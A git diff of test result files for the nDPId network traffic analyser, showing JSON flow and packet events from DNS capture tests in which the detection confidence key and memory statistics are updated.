-00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 
-00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00770{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":60,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":54,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":0,"num_answers":0,"reply_code":0,"query_type":48,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00784{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":62,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1560869916474,"flow_last_seen":1560869916475,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":297,"midstream":0,"thread_ts_msec":1560869916475,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weberlab.de","num_queries":1,"num_answers":5,"reply_code":0,"query_type":48,"rsp_type":48,"rsp_addr":"0.0.0.0"}} 
+00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869913732,"flow_last_seen":1560869913751,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":72,"flow_tot_l4_payload_len":116,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":60550,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869916474,"flow_last_seen":1560869916477,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"194.247.5.14","src_port":39005,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1560869900222,"flow_last_seen":1560869905232,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1424,"flow_tot_l4_payload_len":1528,"flow_avg_l4_payload_len":509,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:765b::a25:53","src_port":55729,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869916459,"flow_last_seen":1560869916473,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":104,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":54590,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1560869886413,"flow_last_seen":1560869886443,"flow_idle_time":200000,"flow_min_l4_payload_len":46,"flow_max_l4_payload_len":69,"flow_tot_l4_payload_len":115,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":52814,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00716{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869882430,"flow_last_seen":1560869882447,"flow_idle_time":200000,"flow_min_l4_payload_len":67,"flow_max_l4_payload_len":71,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2606:4700:4700::1111","src_port":48758,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869889796,"flow_last_seen":1560869889815,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":106,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":42344,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869910534,"flow_last_seen":1560869910547,"flow_idle_time":200000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1524,"flow_avg_l4_payload_len":762,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip4","src_ip":"194.247.5.6","dst_ip":"193.24.227.238","src_port":51791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1560869895045,"flow_last_seen":1560869895070,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":72,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2620:fe::fe","src_port":46709,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00726{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1560869913753,"flow_last_seen":1560869913756,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1732,"flow_tot_l4_payload_len":1786,"flow_avg_l4_payload_len":178,"midstream":0,"thread_ts_msec":1560869916477,"l3_proto":"ip6","src_ip":"2001:470:1f0b:16b0:20c:29ff:fe7c:a4cb","dst_ip":"2001:470:1f0b:16b0::a26:53","src_port":57089,"dst_port":53,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":66,"source":"dns_fragmented.pcap","alias":"nDPId-test","packets-captured":66,"packets-processed":59,"total-skipped-flows":0,"total-l4-payload-len":17861,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":21,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":148,"global_ts_msec":1560869916477} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 66/59 @@ -154,9 +154,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892567 bytes -~~ total memory freed........: 5892567 bytes -~~ total allocations/frees...: 118263/118263 +~~ total memory allocated....: 6026201 bytes +~~ total memory freed........: 6026201 bytes +~~ total allocations/frees...: 121025/121025 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 214 chars ~~ json string max len.......: 2446 chars diff --git a/test/results/dns_invert_query.pcapng.out b/test/results/dns_invert_query.pcapng.out index ff767f61b..1d1a33133 100644 --- a/test/results/dns_invert_query.pcapng.out +++ b/test/results/dns_invert_query.pcapng.out 
@@ -2,7 +2,7 @@ 00558{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1618744019230} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00491{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1618744019230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1618744019230,"pkt":"AAAAAAAAAAEAVKCBCABFAABAAABAAEARzK6tk2yu9LtfAUf7ADUALMGVd\/wJAAAAAAEAAAAAAzIxNgI1OAMyMDIBNAAAAQABAAAAAAAA"} 
-00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1618744019230,"flow_last_seen":1618744019230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1618744019230,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"216.58.202.4","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1618744019235,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1618744019235,"pkt":"AAAAAAAAAAEAVKCBCABFAAAoAABAADsR0cb0u18BrZNsrgA1R\/sAFEgWd\/yJhAAAAAAAAAAAAAA="} 00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1618744019230,"flow_last_seen":1618744019235,"flow_idle_time":200000,"flow_min_l4_payload_len":12,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1618744019235,"l3_proto":"ip4","src_ip":"173.147.108.174","dst_ip":"244.187.95.1","src_port":18427,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"dns_invert_query.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":48,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1618744019235} 
@@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869473 bytes -~~ total memory freed........: 5869473 bytes -~~ total allocations/frees...: 118115/118115 +~~ total memory allocated....: 6003107 bytes +~~ total memory freed........: 6003107 bytes +~~ total allocations/frees...: 120877/120877 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 469 chars ~~ json string max len.......: 781 chars diff --git a/test/results/dns_long_domainname.pcap.out b/test/results/dns_long_domainname.pcap.out index d34981d55..3be6b9db6 100644 --- a/test/results/dns_long_domainname.pcap.out +++ b/test/results/dns_long_domainname.pcap.out 
@@ -2,10 +2,10 @@ 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1599686652555} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00529{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1599686652555,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":103,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":103,"pkt_l4_len":69,"thread_ts_msec":1599686652555,"pkt":"EBMx8Tl2KDc3AG3ICABFAABZsREAAEAR9yLAqAGoCAgICP8fADUARcOpi1QBAAABAAAAAAAABmdtcjAyYwIxNgEwDGZoa2Zoc2RrZmhzawZ0dW5uZWwHZXhhbXBsZQNjb20AAAEAAQ=="} 
-00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00804{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"dns_long_domainname.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1599686652555,"flow_last_seen":1599686652555,"flow_idle_time":200000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":61,"flow_tot_l4_payload_len":61,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1599686652555,"l3_proto":"ip4","src_ip":"192.168.1.168","dst_ip":"8.8.8.8","src_port":65311,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"gmr02c.16.0.fhkfhsdkfhsk.tunnel.example.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
